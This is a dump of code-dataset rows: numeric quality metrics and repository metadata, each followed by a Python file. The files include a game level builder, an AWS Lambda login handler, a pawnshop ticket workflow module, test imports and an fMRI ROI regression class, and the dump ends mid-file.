| 6.063158
| 0.389474
| 0.200521
| 0.224826
| 0.21875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001498
| 0.207245
| 1,684
| 69
| 84
| 24.405797
| 0.861423
| 0.152019
| 0
| 0.184211
| 0
| 0
| 0.034188
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0.184211
| 0.157895
| 0.105263
| 0.684211
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
dc49fac2038760e036d4b9da6d2f64f21e3cffb5
| 35
|
py
|
Python
|
Geo-localization/Model/__init__.py
|
kuihua/Explain_Metric_Learning
|
708c536102c59f3d5478bf17ea002704261e0a28
|
[
"MIT"
] | 2
|
2020-07-31T02:43:03.000Z
|
2020-07-31T14:56:52.000Z
|
Geo-localization/Model/__init__.py
|
kuihua/Explain_Metric_Learning
|
708c536102c59f3d5478bf17ea002704261e0a28
|
[
"MIT"
] | null | null | null |
Geo-localization/Model/__init__.py
|
kuihua/Explain_Metric_Learning
|
708c536102c59f3d5478bf17ea002704261e0a28
|
[
"MIT"
] | null | null | null |
from .models import Siamese_network
| 35
| 35
| 0.885714
| 5
| 35
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 35
| 1
| 35
| 35
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
dc5898ffb5d6ff005a225b727289581f51553cb5
| 44
|
py
|
Python
|
feature_t.py
|
Anne-Fern/shazam-air
|
e51f9a11b896410599e9574417509646b962f86e
|
[
"MIT"
] | 19
|
2020-03-12T19:14:38.000Z
|
2022-03-22T19:51:55.000Z
|
feature_t.py
|
Anne-Fern/shazam-air
|
e51f9a11b896410599e9574417509646b962f86e
|
[
"MIT"
] | null | null | null |
feature_t.py
|
Anne-Fern/shazam-air
|
e51f9a11b896410599e9574417509646b962f86e
|
[
"MIT"
] | 3
|
2020-11-06T15:59:06.000Z
|
2021-08-11T08:59:05.000Z
|
import featureExtraction.feature as feature
| 22
| 43
| 0.886364
| 5
| 44
| 7.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 44
| 1
| 44
| 44
| 0.975
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
dc6a28f998b0e308e376c26900e20ae87342c680
| 2,957
|
py
|
Python
|
utils/scripts/OOOlevelGen/src/daily_levels/185.py
|
fullscreennl/monkeyswipe
|
c56192e202674dd5ab18023f6cf14cf51e95fbd0
|
[
"MIT"
] | null | null | null |
utils/scripts/OOOlevelGen/src/daily_levels/185.py
|
fullscreennl/monkeyswipe
|
c56192e202674dd5ab18023f6cf14cf51e95fbd0
|
[
"MIT"
] | null | null | null |
utils/scripts/OOOlevelGen/src/daily_levels/185.py
|
fullscreennl/monkeyswipe
|
c56192e202674dd5ab18023f6cf14cf51e95fbd0
|
[
"MIT"
] | null | null | null |
import LevelBuilder
from sprites import *
def render(name,bg):
lb = LevelBuilder.LevelBuilder(name+".plist",background=bg)
lb.addObject(Beam.BeamSprite(x=397, y=30,width=27,height=6,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ).setName('axis1'))
lb.addObject(Beam.BeamSprite(x=461, y=30,width=27,height=6,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ).setName('axis2'))
lb.addObject(Hero.HeroSprite(x=429, y=55,width=32,height=32))
lb.addObject(Beam.BeamSprite(x=237, y=38,width=502,height=14,angle='-10',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=297, y=158,width=383,height=13,angle='10',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Friend.FriendSprite(x=397, y=30,width=20,height=20,angle='0',restitution=0.2,static='false',friction=0.8,density=20 ).setName('wheel1'))
lb.addObject(Friend.FriendSprite(x=461, y=30,width=20,height=20,angle='0',restitution=0.2,static='false',friction=0.8,density=20 ).setName('wheel2'))
lb.addObject(Joints.DistanceJoint(body1='Hero',body2='axis1',damping='0.2',freq='5'))
lb.addObject(Joints.DistanceJoint(body1='axis2',body2='axis1',damping='0.2',freq='5'))
lb.addObject(Joints.DistanceJoint(body1='axis2',body2='Hero',damping='0.2',freq='5'))
lb.addObject(Joints.RevoluteJoint(body1='axis1',body2='wheel1',motor_speed='50',enable_motor='true',torque='10000',lower_angle='12',upper_angle='50',enable_limit='false',collide_connected='false'))
lb.addObject(Joints.RevoluteJoint(body1='axis2',body2='wheel2',motor_speed='50',enable_motor='true',torque='10000',lower_angle='12',upper_angle='50',enable_limit='false',collide_connected='false'))
lb.addObject(Beam.BeamSprite(x=178, y=264,width=382,height=13,angle='-10',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Star.StarSprite(x=98, y=303,width=32,height=32))
lb.addObject(Nut.NutSprite(x=156, y=288,width=32,height=32,restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Beam.BeamSprite(x=69, y=306,width=23,height=14,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Enemy.EnemySprite(x=331, y=77,width=32,height=32,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Enemy'))
lb.addObject(Enemy.EnemySprite(x=146, y=110,width=32,height=32,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Enemy'))
lb.addObject(Enemy.EnemySprite(x=188, y=202,width=32,height=32,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Enemy'))
lb.addObject(Enemy.EnemySprite(x=320, y=222,width=32,height=32,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Enemy'))
lb.addObject(Enemy.EnemySprite(x=458, y=297,width=32,height=32,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Enemy'))
lb.render()
| 2,957
| 2,957
| 0.747717
| 497
| 2,957
| 4.424547
| 0.201207
| 0.105048
| 0.082765
| 0.120964
| 0.836289
| 0.709868
| 0.686221
| 0.686221
| 0.672124
| 0.672124
| 0
| 0.106198
| 0.028745
| 2,957
| 1
| 2,957
| 2,957
| 0.659471
| 0
| 0
| 0
| 0
| 0
| 0.087897
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.076923
| 0
| 0.115385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
dc8ac76081e452d9e85dff1b0e64bd1e5e3e71c3
| 2,200
|
py
|
Python
|
sites/pycharm-guide/demos/tutorials/intro-aws/authentication/app.py
|
stevewhitmore/jetbrains_guide
|
234eb44a3ecc670048e4d02b3b5b39affe4a9e31
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 16
|
2019-02-01T14:03:53.000Z
|
2019-08-18T13:57:33.000Z
|
sites/pycharm-guide/demos/tutorials/intro-aws/authentication/app.py
|
stevewhitmore/jetbrains_guide
|
234eb44a3ecc670048e4d02b3b5b39affe4a9e31
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 3
|
2019-03-22T07:40:33.000Z
|
2019-04-03T16:04:35.000Z
|
sites/pycharm-guide/demos/tutorials/intro-aws/authentication/app.py
|
stevewhitmore/jetbrains_guide
|
234eb44a3ecc670048e4d02b3b5b39affe4a9e31
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 2
|
2019-03-25T15:00:12.000Z
|
2019-08-18T13:57:36.000Z
|
import ujson
from marshmallow import ValidationError
from .utils import validator
def lambda_handler(event, context):
try:
body = ujson.loads(event['body'])
result = validator.UserLoginSchema()
res = not bool(result.validate(body))
if res:
return {
"statusCode": 200,
"body": ujson.dumps({
"message": "Welcome !",
"data": {
"token": result.load(body)['token']
}
})
}
else:
return {
"statusCode": 400,
"body": ujson.dumps({
"message": "Error !",
"data": result.validate(body)
})
}
except ValidationError as err:
return {
"statusCode": 400,
"body": ujson.dumps({
"message": err.messages
})
}
except KeyError as error:
return {
"statusCode": 400,
"body": ujson.dumps({
"message": "Something went wrong. Unable to parse data ! " + str(error)
})
}
def token_refresh(event, context):
try:
body = ujson.loads(event['body'])
result = validator.RefreshTokenSchema()
res = not bool(result.validate(body))
if res:
return {
"statusCode": 200,
"body": ujson.dumps({
"message": None,
"data": result.load(body)
})
}
else:
return {
"statusCode": 400,
"body": ujson.dumps({
"message": "Error !",
"data": result.validate(body)
})
}
except ValidationError as err:
return {
"statusCode": 400,
"body": ujson.dumps({
"message": err.messages
})
}
except KeyError:
return {
"statusCode": 400,
"body": ujson.dumps({"message": "Something went wrong. Unable to parse data !"})
}
| 26.829268
| 92
| 0.425
| 168
| 2,200
| 5.553571
| 0.291667
| 0.096463
| 0.120043
| 0.180064
| 0.778135
| 0.778135
| 0.778135
| 0.778135
| 0.778135
| 0.778135
| 0
| 0.020253
| 0.461364
| 2,200
| 82
| 93
| 26.829268
| 0.767089
| 0
| 0
| 0.657534
| 0
| 0
| 0.142662
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027397
| false
| 0
| 0.041096
| 0
| 0.178082
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
dc8d261bf2c60b0760a0e581ebfb9377f3bf4e04
| 29
|
py
|
Python
|
brabeion/__init__.py
|
affan2/brabeion
|
381337bada416c9f20d6852b1725a310cdbf85b7
|
[
"BSD-3-Clause"
] | null | null | null |
brabeion/__init__.py
|
affan2/brabeion
|
381337bada416c9f20d6852b1725a310cdbf85b7
|
[
"BSD-3-Clause"
] | null | null | null |
brabeion/__init__.py
|
affan2/brabeion
|
381337bada416c9f20d6852b1725a310cdbf85b7
|
[
"BSD-3-Clause"
] | 1
|
2020-01-08T09:06:26.000Z
|
2020-01-08T09:06:26.000Z
|
from .internals import badges
| 29
| 29
| 0.862069
| 4
| 29
| 6.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 29
| 1
| 29
| 29
| 0.961538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
dc9cfa6c69c17c13ed9d9dd55998cdeaf172ed61
| 177
|
py
|
Python
|
kaulos/__init__.py
|
mkturkcan/Kaulos
|
681dc7d00eebd370061f0ff64eaf167ada39194e
|
[
"MIT"
] | 3
|
2019-09-17T22:20:01.000Z
|
2020-02-16T03:29:14.000Z
|
kaulos/__init__.py
|
mkturkcan/Kaulos
|
681dc7d00eebd370061f0ff64eaf167ada39194e
|
[
"MIT"
] | null | null | null |
kaulos/__init__.py
|
mkturkcan/Kaulos
|
681dc7d00eebd370061f0ff64eaf167ada39194e
|
[
"MIT"
] | 1
|
2019-10-02T15:24:08.000Z
|
2019-10-02T15:24:08.000Z
|
from __future__ import absolute_import
__version__ = '0.1.0'
from .compact_dependencies import *
from .kaulos_engine import *
from .kaulos_models import *
from .kaulos import *
| 25.285714
| 38
| 0.79661
| 24
| 177
| 5.375
| 0.5
| 0.232558
| 0.372093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019481
| 0.129944
| 177
| 6
| 39
| 29.5
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0.028249
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.833333
| 0
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f4945d68dcc1716694575471ae0afb99ddf11e5e
| 58
|
py
|
Python
|
rlberry/agents/kovi/__init__.py
|
antoine-moulin/rlberry
|
676af9d1bb9094a6790a9aa3ff7e67b13584a183
|
[
"MIT"
] | null | null | null |
rlberry/agents/kovi/__init__.py
|
antoine-moulin/rlberry
|
676af9d1bb9094a6790a9aa3ff7e67b13584a183
|
[
"MIT"
] | null | null | null |
rlberry/agents/kovi/__init__.py
|
antoine-moulin/rlberry
|
676af9d1bb9094a6790a9aa3ff7e67b13584a183
|
[
"MIT"
] | null | null | null |
# from .kovi import KOVIAgent
from .kovi2 import KOVIAgent
| 29
| 29
| 0.810345
| 8
| 58
| 5.875
| 0.625
| 0.638298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02
| 0.137931
| 58
| 2
| 30
| 29
| 0.92
| 0.465517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f49f8c22dcd5a61861e6b412106bc7f4d7dbc64e
| 1,067
|
py
|
Python
|
pyautofinance/tests/__init__.py
|
webclinic017/PyAutoFinance
|
532cb1c5418dd9eeb07f2f08646170cde1fe0303
|
[
"MIT"
] | null | null | null |
pyautofinance/tests/__init__.py
|
webclinic017/PyAutoFinance
|
532cb1c5418dd9eeb07f2f08646170cde1fe0303
|
[
"MIT"
] | null | null | null |
pyautofinance/tests/__init__.py
|
webclinic017/PyAutoFinance
|
532cb1c5418dd9eeb07f2f08646170cde1fe0303
|
[
"MIT"
] | 1
|
2022-02-24T09:18:13.000Z
|
2022-02-24T09:18:13.000Z
|
from pyautofinance.tests.test_back_datafeed import TestBackDatafeed
from pyautofinance.tests.test_brokers import TestBrokers
from pyautofinance.tests.test_ccxt_datafeed import TestCCXTDatafeed
from pyautofinance.tests.test_config import TestConfig
from pyautofinance.tests.test_dataflux import TestDataflux
from pyautofinance.tests.test_engine import TestEngine
from pyautofinance.tests.test_extractors import TestExtractors
from pyautofinance.tests.test_learn import TestLearn
from pyautofinance.tests.test_monkey_simulator import TestMonkeySimulator
from pyautofinance.tests.test_monkey_strat import TestMonkeyStrat
from pyautofinance.tests.test_monte_carlo_simulator import TestMonteCarloSimulator
from pyautofinance.tests.test_ohlcv import TestOHLCV
from pyautofinance.tests.test_plotting import TestPlotting
from pyautofinance.tests.test_results import TestResults
from pyautofinance.tests.test_testers import TestTesters
from pyautofinance.tests.test_timers import TestTimers
from pyautofinance.tests.test_walk_forward_simulator import TestWalkForwardSimulator
| 59.277778
| 84
| 0.904405
| 127
| 1,067
| 7.401575
| 0.338583
| 0.307447
| 0.397872
| 0.470213
| 0.068085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06373
| 1,067
| 17
| 85
| 62.764706
| 0.940941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f4a7df5bd3772ada7afa405dd78d9d790ae670ce
| 34
|
py
|
Python
|
plugins/hw_wallet/__init__.py
|
benma/electrum
|
fbe27fce045d5b44a71a6612716ded9103ed77dd
|
[
"MIT"
] | null | null | null |
plugins/hw_wallet/__init__.py
|
benma/electrum
|
fbe27fce045d5b44a71a6612716ded9103ed77dd
|
[
"MIT"
] | null | null | null |
plugins/hw_wallet/__init__.py
|
benma/electrum
|
fbe27fce045d5b44a71a6612716ded9103ed77dd
|
[
"MIT"
] | null | null | null |
from .plugin import HW_PluginBase
| 17
| 33
| 0.852941
| 5
| 34
| 5.6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
525a65df92062e1c846ab7c998aeb3b8788896e0
| 239
|
py
|
Python
|
Data/Data.py
|
rohitjain00/Trading-Bot
|
c31967b464d4372d60c28d5e9ef308d4cacffbeb
|
[
"Apache-2.0"
] | 2
|
2020-05-17T07:44:48.000Z
|
2020-05-26T06:11:40.000Z
|
Data/Data.py
|
rohitjain00/Trading-Bot
|
c31967b464d4372d60c28d5e9ef308d4cacffbeb
|
[
"Apache-2.0"
] | null | null | null |
Data/Data.py
|
rohitjain00/Trading-Bot
|
c31967b464d4372d60c28d5e9ef308d4cacffbeb
|
[
"Apache-2.0"
] | null | null | null |
from abc import ABC, abstractmethod
class Data(ABC):
@abstractmethod
def data_from(self):
pass
@abstractmethod
def get_train_data(self):
pass
@abstractmethod
def get_new_data(self):
pass
| 14.9375
| 35
| 0.635983
| 28
| 239
| 5.25
| 0.428571
| 0.346939
| 0.29932
| 0.340136
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.297071
| 239
| 15
| 36
| 15.933333
| 0.875
| 0
| 0
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0.272727
| 0.090909
| 0
| 0.454545
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
527e60dff45fbe65ad00cb7bdb5100fc06d0b325
| 5,782
|
py
|
Python
|
pawnshop_management/pawnshop_management/custom_codes/update_pawn_ticket.py
|
gpRabie/pawnshop_management
|
0f23246d25a448aaa28108888c0d4e31b668680b
|
[
"MIT"
] | null | null | null |
pawnshop_management/pawnshop_management/custom_codes/update_pawn_ticket.py
|
gpRabie/pawnshop_management
|
0f23246d25a448aaa28108888c0d4e31b668680b
|
[
"MIT"
] | null | null | null |
pawnshop_management/pawnshop_management/custom_codes/update_pawn_ticket.py
|
gpRabie/pawnshop_management
|
0f23246d25a448aaa28108888c0d4e31b668680b
|
[
"MIT"
] | 1
|
2022-03-18T06:50:55.000Z
|
2022-03-18T06:50:55.000Z
|
import frappe
from frappe.utils import today
@frappe.whitelist()
def update_pawn_tickets():
non_jewelry = frappe.db.get_all('Pawn Ticket Non Jewelry',
filters={
'workflow_state': 'Active'
},
pluck='name')
for i in range(len(non_jewelry)):
pawn_ticket=frappe.get_doc('Pawn Ticket Non Jewelry', non_jewelry[i])
print(type(pawn_ticket.expiry_date))
# if pawn_ticket.expiry_date) < str(today()):
# print("True")
@frappe.whitelist()
def change_pawn_ticket_nj_status_to_expire():
expired_pt = frappe.db.get_all('Pawn Ticket Non Jewelry',
filters={
'expiry_date': today(),
'workflow_state': "Active"
},
fields=['name']
)
for i in range(len(expired_pt)):
frappe.db.set_value('Pawn Ticket Non Jewelry', expired_pt[i].name, 'workflow_state', 'Expired')
frappe.db.commit()
change_pt_inventory_batch_and_items('Pawn Ticket Non Jewelry', expired_pt[i].name)
def change_pt_inventory_batch_and_items(pawn_ticket_type, pawn_ticket):
doc = frappe.get_doc(pawn_ticket_type, pawn_ticket)
if pawn_ticket_type == 'Pawn Ticket Non Jewelry':
for items in doc.get('non_jewelry_items'):
frappe.db.set_value('Non Jewelry Items', items.item_no, 'workflow_state', 'Collected')
frappe.db.commit()
frappe.db.set_value('Non Jewelry Batch', doc.inventory_tracking_no, 'workflow_state', 'Expired')
frappe.db.commit()
elif pawn_ticket_type == 'Pawn Ticket Jewelry':
for items in doc.get('jewelry_items'):
frappe.db.set_value('Jewelry Items', items.item_no, 'workflow_state', 'Collected')
frappe.db.commit()
frappe.db.set_value('Jewelry Batch', doc.inventory_tracking_no, 'workflow_state', 'Expired')
frappe.db.commit()
@frappe.whitelist()
def update_fields_after_status_change_collect_pawn_ticket(pawn_ticket_type, inventory_tracking_no, pawn_ticket_no):
frappe.db.set_value(pawn_ticket_type, pawn_ticket_no, 'change_status_date', today())
frappe.db.commit()
doc = frappe.get_doc(pawn_ticket_type, pawn_ticket_no)
if pawn_ticket_type == 'Pawn Ticket Non Jewelry':
for items in doc.get('non_jewelry_items'):
frappe.db.set_value('Non Jewelry Items', items.item_no, 'workflow_state', 'Collected')
frappe.db.commit()
frappe.db.set_value('Non Jewelry Batch', inventory_tracking_no, 'workflow_state', 'Expired')
frappe.db.commit()
@frappe.whitelist()
def update_fields_after_status_change_review_pawn_ticket(pawn_ticket_type, inventory_tracking_no, pawn_ticket_no):
frappe.db.set_value(pawn_ticket_type, pawn_ticket_no, 'change_status_date', today())
frappe.db.commit()
doc = frappe.get_doc(pawn_ticket_type, pawn_ticket_no)
if pawn_ticket_type == 'Pawn Ticket Non Jewelry':
for items in doc.get('non_jewelry_items'):
frappe.db.set_value('Non Jewelry Items', items.item_no, 'workflow_state', 'Returned')
frappe.db.commit()
frappe.db.set_value('Non Jewelry Batch', inventory_tracking_no, 'workflow_state', 'Returned')
frappe.db.commit()
@frappe.whitelist()
def update_fields_after_status_change_redeem_pawn_ticket(pawn_ticket_type, inventory_tracking_no, pawn_ticket_no):
frappe.db.set_value(pawn_ticket_type, pawn_ticket_no, 'change_status_date', today())
frappe.db.commit()
doc = frappe.get_doc(pawn_ticket_type, pawn_ticket_no)
if pawn_ticket_type == 'Pawn Ticket Non Jewelry':
for items in doc.get('non_jewelry_items'):
frappe.db.set_value('Non Jewelry Items', items.item_no, 'workflow_state', 'Redeemed')
frappe.db.commit()
frappe.db.set_value('Non Jewelry Batch', inventory_tracking_no, 'workflow_state', 'Redeemed')
frappe.db.commit()
@frappe.whitelist()
def update_fields_after_status_change_pull_out_pawn_ticket(pawn_ticket_type, inventory_tracking_no, pawn_ticket_no):
frappe.db.set_value(pawn_ticket_type, pawn_ticket_no, 'change_status_date', today())
frappe.db.commit()
doc = frappe.get_doc(pawn_ticket_type, pawn_ticket_no)
if pawn_ticket_type == 'Pawn Ticket Non Jewelry':
for items in doc.get('non_jewelry_items'):
frappe.db.set_value('Non Jewelry Items', items.item_no, 'workflow_state', 'Pull Out')
frappe.db.commit()
frappe.db.set_value('Non Jewelry Batch', inventory_tracking_no, 'workflow_state', 'Pull Out')
frappe.db.commit()
@frappe.whitelist()
def increment_b_series(branch):
if branch == "Rabie's House":
doc = frappe.get_doc("Non Jewelry Naming Series", "Rabie's House")
doc.b_series += 1
doc.save(ignore_permissions=True)
elif branch == "Garcia's Pawnshop - CC":
doc = frappe.get_doc("Non Jewelry Naming Series", "Garcia's Pawnshop - CC")
doc.b_series += 1
doc.save(ignore_permissions=True)
elif branch == "Garcia's Pawnshop - MOL":
doc = frappe.get_doc("Non Jewelry Naming Series", "Garcia's Pawnshop - MOL")
doc.b_series += 1
doc.save(ignore_permissions=True)
elif branch == "Garcia's Pawnshop - POB":
doc = frappe.get_doc("Non Jewelry Naming Series", "Garcia's Pawnshop - POB")
doc.b_series += 1
doc.save(ignore_permissions=True)
elif branch == "Garcia's Pawnshop - GTC":
doc = frappe.get_doc("Non Jewelry Naming Series", "Garcia's Pawnshop - GTC")
doc.b_series += 1
doc.save(ignore_permissions=True)
elif branch == "Garcia's Pawnshop - TNZ":
doc = frappe.get_doc("Non Jewelry Naming Series", "Garcia's Pawnshop - TNZ")
doc.b_series += 1
doc.save(ignore_permissions=True)
| 45.888889
| 116
| 0.686095
| 796
| 5,782
| 4.693467
| 0.103015
| 0.141863
| 0.074946
| 0.072805
| 0.890525
| 0.86697
| 0.827088
| 0.827088
| 0.771681
| 0.719754
| 0
| 0.001289
| 0.195088
| 5,782
| 126
| 117
| 45.888889
| 0.801461
| 0.01055
| 0
| 0.53211
| 0
| 0
| 0.238328
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073395
| false
| 0
| 0.018349
| 0
| 0.091743
| 0.009174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
529785de5c0c47c6e2c8d73d2ae066b26646de2d
| 26,356
|
py
|
Python
|
catreward/roi/exps/base2.py
|
parenthetical-e/fmri
|
32c5571d8767684ec6586320e85485cd89ed9327
|
[
"BSD-2-Clause"
] | 4
|
2018-02-11T16:18:46.000Z
|
2021-11-28T15:43:25.000Z
|
catreward/roi/exps/base2.py
|
parenthetical-e/fmri
|
32c5571d8767684ec6586320e85485cd89ed9327
|
[
"BSD-2-Clause"
] | null | null | null |
catreward/roi/exps/base2.py
|
parenthetical-e/fmri
|
32c5571d8767684ec6586320e85485cd89ed9327
|
[
"BSD-2-Clause"
] | 1
|
2018-05-23T10:28:22.000Z
|
2018-05-23T10:28:22.000Z
|
""" Another (sub)set of models, this one contains only those with literature
driven RL (or related) terms. Prior analyses were more exploratory.
In this set we allow for seperate regressors matching behavoiral accuracy,
as well as inverted and positive-value-only coding schemes. """
from roi.base import Mean
class Rewardrecode(Mean):
""" A Roi analysis class, customized for the catreward project.
Unlike Catreward, this reads in the average bold data from a
text file. """
def __init__(self, TR, roi_name, trials, durations, data):
Mean.__init__(self, TR, roi_name, trials, durations, data)
self.data['meta']['bold'] = self.roi_name
self.create_bold(preprocess=True)
self.create_hrf(function_name='double_gamma')
# --
# Accuracy
def model_0101(self):
""" Behavioral accuracy. """
data_to_use = ['acc']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0102(self):
""" Behavioral accuracy, diminished by (exponential) similarity. """
data_to_use = ['acc_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0103(self):
""" Behavioral accuracy, diminished by (gaussian) similarity. """
data_to_use = ['acc_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Gains and losses
def model_0201(self):
""" Gains and losses. """
data_to_use = ['gl']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0202(self):
""" Gains and losses, diminished by (exponential) similarity. """
data_to_use = ['gl_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0203(self):
""" Gains and losses, diminished by (gaussian) similarity. """
data_to_use = ['gl_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l into 2 regressors
def model_0301(self):
""" Gains and losses, in 2 regressors. """
data_to_use = ['gl_1', 'gl_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0302(self):
""" Gains and losses, diminished by (exponential) similarity,
